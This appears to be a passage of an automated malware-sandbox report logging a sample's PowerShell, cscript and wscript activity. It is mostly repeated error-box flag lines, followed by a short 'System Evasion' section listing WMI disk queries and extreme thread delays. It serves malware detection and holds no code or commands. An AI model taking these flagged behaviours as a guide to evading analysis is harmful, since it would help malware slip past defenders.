Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4421			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5524			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6140
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3519

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216	Thread sleep count: 4421 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216	Thread sleep count: 5524 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 6140 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 3519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

